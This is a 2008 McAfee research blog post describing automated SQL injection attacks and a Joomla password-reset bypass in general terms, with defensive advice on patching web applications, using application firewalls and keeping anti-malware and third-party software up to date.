McAfee TrustedSource
Create Account | Login  | What is TrustedSource?
 
Home  Threats and Trends  McAfee Research Blog
TrustedSource™ Query
Enter IP address, domain name or URL to check reputation/traffic patterns:
Search
 


Latest Malware Threats
 RSS Feed
Exploit.MS04-033.Excel.A2009-06-30
Worm.Agent.W.452009-05-06
Worm.Autorun.cbm.42009-03-08
Trojan.Dldr.Agent.bfbm2009-03-05
Exploit.PDF.33552009-02-28
Worm.Sohanad.BM2009-02-13
View Malware Library
 

McAfee Research Blog

Web Application Vulnerabilities Can Make The Difference - How To Tackle The Threat

August 18th, 2008

Automated SQL injection attacks against Websites have truely changed the Web threat-landscape this year. Attack toolkits misuse search engines to query for vulnerable Web pages. One reason why such attacks remain so successful is that it’s not based on a common Web server vulnerability that could simply be patched. Rather, the attacks work due to security flaws in various wide-spread Web applications that, on some pages, do not sufficiently verify user input submitted via Web forms or URL parameters. Commonly deployed Web applications include Content Management Systems, Weblog and Internet Forum systems.

Such a flaw’s result usually is that a SQL statement can be passed in through some unverified URL parameter or HTTP POST upload, and is then executed on the Web application side due to missing verification or normalization. Executing the SQL stateminfectedent usually leads to injection of malicious script code into database tables where the HTML content of dynamically generated Web pages is stored.

Yet SQL injection is not the only type of vulnerability that can lead to a Website’s compromise. One recent example would be an authentication bypass vulnerability discovered in the popular open-source Content Management System Joomla!. The vulnerability allows an attacker to reset the password of the installation’s first user account, usually an Administrator - and afterwards the attacker can log into the system and perform malicious acts such as including malicious code into the legit pages.

It’s most important for Website administrators to assess what Web applications are installed on their servers, stay up-to-date with what vulnerabilities have been discovered in those systems lately and apply patches as soon as they are provided by the vendor. Can premature patches break some (legacy) functionality in the Web application? Maybe it can, but not applying the patch, on a system facing the Internet, will sooner or later break much more. An infected Website not only serves malware to your visitors, it also leads to confidence loss by your visitors and customers of your business. As a proactive measure against common attacks such as SQL injection, placing an application-aware Firewall with an Intrusion Prevention System in front of your Web server can save you a lot of trouble.

Home users and administrators of corporate user PCs need to ensure that Anti-Malware software is in place and kept current. Sounds like old news? Yes, but the continuing prevalence of the old NetSky worm, as well as the continuing exploitation of 2006’s MDAC vulnerability (MS06-014), underline that still too many users are suicidally surfing the Web without proper protection in place. Also, assess what kinds of third-party applications are installed - are the versions of Flash Player, Adobe Reader, QuickTime, Java and others up-to-date? And are they kept up-to-date? Attackers are increasingly attacking vulnerabilities in these applications as well.


Author: Anti-Malware Team

Back to McAfee Research Blog overview

McAfee Homepage | Contact | Privacy Policy

Copyright © 2007-2009 McAfee, Inc. All Rights Reserved.

ANY INFORMATION PROVIDED BY MCAFEE ON THIS BLOG ARE OFFERED "AS IS" WITH NO EXPRESS OR IMPLIED WARRANTIES, CLAIMS, PROMISES OR GUARANTEES ABOUT THE ACCURACY, COMPLETENESS, OR ADEQUACY OF THE INFORMATION CONTAINED IN OR LINKED TO AND NO RIGHTS ARE CONFERRED. BY USING THIS BLOG, YOU ASSUME ALL RISK FOR YOUR USE. IN NO EVENT WILL MCAFEE BE LIABLE FOR ANY INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL, EXEMPLARY, OR OTHER DAMAGES WHETHER OR NOT MCAFEE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH LOSS OR DAMAGE. MCAFEE HAS NO OBLIGATION TO POST BLOG SUBMISSIONS OR RESPONSES.